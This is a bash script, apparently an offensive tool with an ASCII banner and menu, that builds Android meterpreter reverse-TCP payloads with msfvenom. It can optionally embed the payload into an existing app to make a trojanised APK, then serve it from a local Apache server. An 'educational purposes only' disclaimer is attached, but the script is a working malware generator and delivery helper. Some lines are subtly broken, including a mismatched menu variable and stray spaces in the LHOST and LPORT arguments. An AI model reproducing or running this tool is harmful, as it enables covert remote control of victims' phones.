clear; echo '\e[0;31m
  ▄████████▄    ▄██████▄     ▄██████▄    ▄████████▄  ▀███     ▄█▀  ████████▄     ▄██████▄    ▄██████▄ ▀█████████▀   ████████▄  
  ███          ███   ▀███   ███    ███   ███          ███   ▄█▀    ███   ▀███   ███   ▀███  ███    ███    ███       ███   ▀███ 
  ███          ███    ███   ███    ███   ███          ███ ▄█▀      ███    ███   ███    ███  ███    ███    ███       ███    ███   
  ███          ███▄▄▄▄██▀   ███▄▄▄▄███   ███          ████         ███    ███   ███▄▄▄▄██▀  ███    ███    ███       ███    ███ 
  ███          ███▀█▄       ███    ███   ███          ███ ▀█▄      ███    ███   ███▀█▄      ███    ███    ███       ███    ███
  ███          ███  ▀█▄     ███    ███   ███          ███   ▀█▄    ███   ▄███   ███  ▀█▄    ███    ███    ███       ███   ▄███ 
  ▀████████▀  ▄███    ▀█▄   ███    ███   ▀████████▀  ▄███     ▀█▄  ████████▀   ▄███    ▀█▄   ▀██████▀  ▀████████▀   ████████▀ 
              
                                                                    This tool is for educational purposes only \e[0;31m
                                                  \e[1;34m
                         ______________________________
                        |                              |
                        |  {@}  Coded By PyAmran  {@}  |
                        |______________________________|

\e[1;33m
                                   >>>>>>>>>>>>>>>>   MENU   <<<<<<<<<<<<<<<<<<

{1} Android      >>  payload generator
{2} Embed        >>  Others
{3} Disclaimer
{4} Exit
\e[1;33m

Select the number
'
android='1'
Other='2'
disclaimer='3'
exit='4'
read a

if [ "$a" = "$android" ]; then
echo 'Enter LHOST:'
read ip
echo 'Enter LPORT: '
read port

echo 'Do you wanna generate a payload with existing application?(yes/no) :'
read answer
if [ "$answer" = "yes" ]; then
echo 'Path of original application: '
read path
echo ''
                       
echo 'Generation is under Processing.....please wait for a moment...'
echo 'To Abort: ctrl+c'
msfvenom -x $path -p android/meterpreter/reverse_tcp LHOST= $ip LPORT= $port --encoder -o /root/pdroid.apk
else
echo ''

echo 'Generation is under Processing.....please wait for a moment...'
echo 'To Abort: ctrl+c'
msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port --encoder php/base64 -o /root/pdroid.apk
fi

#------------------------------------------------------------------- Hosting the payload ---------------------------------------
echo 'Do you want to host the package?(yes/no):'
read answer
if [ "$answer" = "yes" ]; then
clear; echo '\e[0;31m

  ▄████████▄    ▄██████▄     ▄██████▄    ▄████████▄  ▀███     ▄█▀  ████████▄     ▄██████▄    ▄██████▄ ▀█████████▀   ████████▄  
  ███          ███   ▀███   ███    ███   ███          ███   ▄█▀    ███   ▀███   ███   ▀███  ███    ███    ███       ███   ▀███ 
  ███          ███    ███   ███    ███   ███          ███ ▄█▀      ███    ███   ███    ███  ███    ███    ███       ███    ███   
  ███          ███▄▄▄▄██▀   ███▄▄▄▄███   ███          ████         ███    ███   ███▄▄▄▄██▀  ███    ███    ███       ███    ███ 
  ███          ███▀█▄       ███    ███   ███          ███ ▀█▄      ███    ███   ███▀█▄      ███    ███    ███       ███    ███
  ███          ███  ▀█▄     ███    ███   ███          ███   ▀█▄    ███   ▄███   ███  ▀█▄    ███    ███    ███       ███   ▄███ 
  ▀████████▀  ▄███    ▀█▄   ███    ███   ▀████████▀  ▄███     ▀█▄  ████████▀   ▄███    ▀█▄   ▀██████▀  ▀████████▀   ████████▀ 
  
                                                                    This tool is for educational purposes only \e[0;31m
                                                  \e[1;34m
                         ______________________________
                        |                              |
                        |  {@}  Coded By PyAmran  {@}  |
                        |______________________________|

\e[1;33m



                                              Choose the Platform
                              >>>>>>>>>>>>>>>>--------------------<<<<<<<<<<<<<<<<<<
                                                             
                               {1} Localhost          >>  Apache server on localhost
                               {2} Cloudflared        >>  via Cloudflared Tunnel 
     \e[1;33m 
     '
     
read answer
if [ "$answer" = "2" ] ; then
echo 'Service not available'
echo 'Thank You For Using'
echo 'exiting'
else
mv /root/pdroid.apk /var/www/html/pdroid.apk
service apache2 start
echo 'URL: http://localhost/pdroid.apk'
fi

# for skip or 'no' response of Hosting query
else
echo 'Thank You For Using'
echo 'exiting'
fi
# ------------------------------------------------------------------- Hosting the payload ------------------------------------------

# For Main Menu
elif [ "$a" = "$other" ] ; then
echo 'Service not available'
echo 'Thank You For Using'
echo 'exiting'

elif [ "$a" = "$disclaimer" ] ; then
echo "\e[0;31mThis tool is for educational purposes only. Any activity or activity related to the information contained herein is solely your responsibility. Misuse of the information contained herein can result in criminal charges against suspected persons Developers are not responsible for any damage caused by this script.\e[0m"

else
echo 'Please choose one option'
fi
